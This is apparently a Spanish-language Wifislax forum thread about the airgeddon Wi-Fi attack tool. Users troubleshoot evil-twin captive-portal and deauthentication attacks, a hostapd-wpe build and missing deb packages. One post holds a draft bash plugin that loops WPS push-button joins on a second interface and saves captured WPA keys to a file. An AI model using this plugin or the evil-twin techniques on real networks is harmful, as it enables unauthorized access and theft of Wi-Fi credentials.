salu2
perdona no quiero resultar pesao
entiendo que es una pena el sistema de plugins que te has currao y que apenas se use
pero necesitamos que nos muestres algo mas de info  a mi a otros usuarios
y yo pues tampoco quiero morir tonto 
no se si entiendo bien lo de prehook  postkook y demas pero sencillamente si das un poco de luz de como crear la gente se animara y lo vera mas facil

plugin_name="pruebas.sh"
plugin_description="Wpa_supplicant + wps_cli iface2 capture pussbutton"
plugin_author="Only-Crazy"nonbre que hace y tal y tal  bien
---------

function plugin_template_override_somefunction() {
select_secondary_et_interface
exec_et_captive_portal_attack
}Las funciones que se usaran para llamar a que se ejecute lo deseado
---------

function my_super_pr0_plugin_prehook_supplicant {
select_secondary_et_interface
echo "ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=root
update_config=1" >> "/tmp/supplicant.conf"
}cuando se ejecute la funcion select_secondary_et_interface  para pursuit_mode  guarde configuracion en /tmp/
------------

function my_super_pr0_plugin_posthook_supplicant() {
exec_et_captive_portal_attack

while true ; do
wpa_supplicant -c /tmp/supplicant.conf -D nl80211 -i ${secondary_wifi_interface} -B 2>/dev/null &
sleep 1
wpa_cli -i ${secondary_wifi_interface} wps_pbc any 2>/dev/null
if ( grep -q "network=" /tmp/supplicant.conf ) ; then
        echo -e "\t Key negociation completada!"
wpakey=$( grep "psk=" /tmp/supplicant.conf | cut -d = -f 2 | cut  -c 2- | rev | cut -c 2- | rev )
essid=$( grep "ssid=" /tmp/supplicant.conf | cut -d = -f 2 | tr -d '"' )
killall wpa_supplicant dhclient &>/dev/null
echo -e "\t Key negociation completed! $wpakey" >>/root/Desktop/clave.txt
echo -e "\t WPA Key: $essid"$rescolor>>/root/Desktop/clave.txt
echo -e "\t $essid : $wpakey"
rm -rf /tmp/supplicant.conf
sleep 5
exit
fi
sleep 120 2>/dev/null
done
}
que se ejecute cuando se inicie al AP  o la funcion exec_et_captive_portal_attack

como lo harias porfa si lo haces o das mas info te lo pillariamos a la primera yo y fijo mas usuarios pues es simple parece ¿lo que quiero hacer eso creo 
un bucle en segunda iface que cada 120 segundos reinicie suplicant creo que lo soportaria bien la segunda iface

NOTA : el code es recogido PBC-master de Kdctv tenia algo mas pero bueno para pruebas y demas creo que es perfecto
----
edito

es que si es llamando a cada funcion no entiendo simplificando
###### CUSTOM FUNCTIONS ######
function plugin_template_override_somefunction() {
select_secondary_et_interface
exec_et_captive_portal_attack
}

###### FUNCTION HOOKING: PREHOOK ######
function select_secondary_et_interface {
echo "ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=root
update_config=1" >> "/tmp/supplicant.conf"
}

###### FUNCTION HOOKING: POSTHOOK ######
function exec_et_captive_portal_attack {
wpa_supplicant -c /tmp/supplicant.conf -D nl80211 -i ${secondary_wifi_interface} -B 2>/dev/null &
}
pero al parecer hay que tener cuidado
###### FUNCTION HOOKING: OVERRIDE ######
#Overridden function example
#This will replace an existing function in main airgeddon script to change its behavior in order to execute this content instead of the original

no se si solo me pasara a mi pero intento meter el archivo con el pmkid  a un pendrive y no me deja y he probao con 2 pendrives.Me dice que no se puede escribir 

noo,me pasa con wifislax instalado en el disco duro,el archivo que da airgeddon no hay manera de pasarlo a un pendrive.
Pd: si lo renombro por ejemplo a pmkid.txt si me deja 

hola estimados tengo una consulta estoy probando la última versión de airgeddon en wifislax 2.0 , me arroja error hostapd-wpe, por lo que comentan la version correcta es la 2.7 que descargue de aqui, pero aplicando los comando de github no logro hacer una correcta instalación
tar -zxf hostapd-2.7.tar.gz
cd hostapd-2.7
patch -p1 < ../hostapd-wpe.patch (aca me arroja error)
cd hostapd

make
make install
make wpe

Creando certs
cd /etc/hostapd-wpe/certs
./bootstrap
make install  (arroja error)

me podrian orientar un poco gracias.

gracias v1s1t0r me habia complicado buscando info de como hacerlo y no había caso, por fin pude usar la última versión la encontré genial  , me surgen algunas dudas estoy usando el ataque "evil twin AP con portal cautivo" no lograba desautentificar de ninguna forma los equipos pensando que mis adaptador wifi no eran compatibles, hasta que desactive la opción "modo persecución dos" y todo funcional
lo unico es que al momento comenzar el ataque me lanza error




tal vez sea algun problema de algo que no he configurado bien pero la verdad es totalmente funcional
adjunto imagen de mis adaptadores

Hola v1s1t0r,

Yo en todas las últimas versiones de wifislax me da siempre el mismo error de syntax error que a rodypir. Recien iniciada el wifislax desde USB, sin tocar nada. Aparte, haciendo pruebas con mi red y mi password, no me lo reconoce. En "evil twin AP con portal cautivo" , cuando me conecto con el movil al portal fake e introduzco mi contraseña, siempre me dice que es incorrecta. Lo que noto, que mi password wifi es de 4 palabras separadas por espacios y en el script airgeddon me escribe el pass pero en vez de espacios me pone el simbolo del +.

No se colgar fotos en el foro. Lo comparto desde mi oneDrive.

https://1drv.ms/u/s!AkGoIF7dOAzi4jd763LcvZlAQQcu?e=Wia3KU

Aparte de esto modificaría en la rutina de evil twin con portal cautivo, para que si no consigues el handshake con un ataque (mdk4,etc.) , No tengas que volver al inicio a scanear redes de nuevo y repetir todo el preceso. Sino que vuelva a donde seleccionas de nuevo otro ataque de  desautentificacion ya que se hace muy engorroso.
Gracias de antemano.

Comentas cosas que no tienen que ver unas con otras... por una parte lo del DoS... a veces los clientes se desautentican y a veces no. No es una ciencia exacta... hay clientes que les afecta un tipo de ataque y a otros otro. Hay puntos de acceso más susceptibles y otros menos. La distancia y potencia también son importantes. Respecto al DoS pursuit mode, eso es para utilizar dos tarjetas a la vez y que mientras una realiza el falso AP y la desautenticación, otra escanea las redes en busca del AP por si lo cambian de canal. Recordemos que muchos APs tienen el canal configurado en "auto" y al darle un reinicio se cambia de canal dejando tu ataque DoS actuando en un canal en el que ya no hay nada... y con el DoS pursuit mode airgeddon detecta esto y si ve que se cambió de canal te avisa y lanza de nuevo el DoS en el nuevo canal persiguiendo por los canales al AP tantas veces como sea necesario. De ahí el nombre.

Respecto a tu otro error... se ve que tienes algún problema con las nftables... en tu caso utiliza mejor las iptables. Activa la opción desde el menú o modificando el fichero de configuración .airgeddonrc. Más info en el wiki, como siempre.... https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Options

muchas gracias v1s1t0r todo funcionando, voy a incursionar en kali y ver que tal me va

@xumixurri eso q comentas de q si no consigues el handshake vuelvas a un menú donde eliges el DoS de nuevo en lugar de tener que volver a escanear ya está hecho... así que no se muy bien a qué te refieres.... y respecto a lo de las passwords con espacios, juraría que eso funcionaba. Cuando tenga tiempo lo probaré por si a caso... pero me da a mi q algo raro tienes...

Buenas. Si algo raro tengo, esta así ya en la iso Wifislax 2.0 final 64 bitas. la instalé al pen usb y la ejecuté. Y cada vez que reinicio carga la versión de serie de nuevo del pen. O sea que no se por donde puede ir el tema.

Hola gentes del hacking wifi... seguimos trabajando en la versión 10.20 de airgeddon que incluye cambios estructurales para que ahora las pantallas se pinten muchísimo más deprisa que antes! y otros cambios menores...

No obstante, tengo que pedir ayuda en un tema. Sobre todo a la gente que tengáis raspberry pi. Resulta que Debian ha quitado de sus repos algunos paquetes, entre ellos el paquete sslstrip. Por lo tanto, ha desaparecido también de parrot, kali y otras distros que son debian based. Como sabéis, es una dependencia de airgeddon que se usa en un tipo de ataque. Yo aquí tengo dos opciones, o bien retirar funcionalidades igual que retiran paquetes, o bien hacer esto que se me ha ocurrido:

https://github.com/v1s1t0r1sh3r3/airgeddon_deb_packages

Es un repo donde ir recopilando los paquetes deb que hacen falta. Los voy generando con dpkg-repack sobre los que tengo instalados. Si leeis el readme del repo, vereis que en 64 bits está todo, pero en arm faltan algunos.... y claro, no los puedo instalar porque ya han desaparecido. Si alguien tiene alguno que me falta de la lista que está allí, os agradecería que me ayudáseis a completarlo.

Saludos.

Hola v1s1t0r

he encontrado bettercap 1.6.2 y he usado alien para pasar a deb vale o no?

links bettercap y hashcat:

https://www.mediafire.com/file/xar83ozs4rde5qs/bettercap_1.6.2-2_all.deb/file
https://www.mediafire.com/file/8a1kmdj1lssyinq/hashcat_5.1.0-2_all.deb/file

saludos chicos de wifislax 

Puede ser... habría que probarlo, pero muchas gracias por el esfuerzo. Lo probaré.

Hola Funciona el deb o no ?

saludos chicos de Wifislax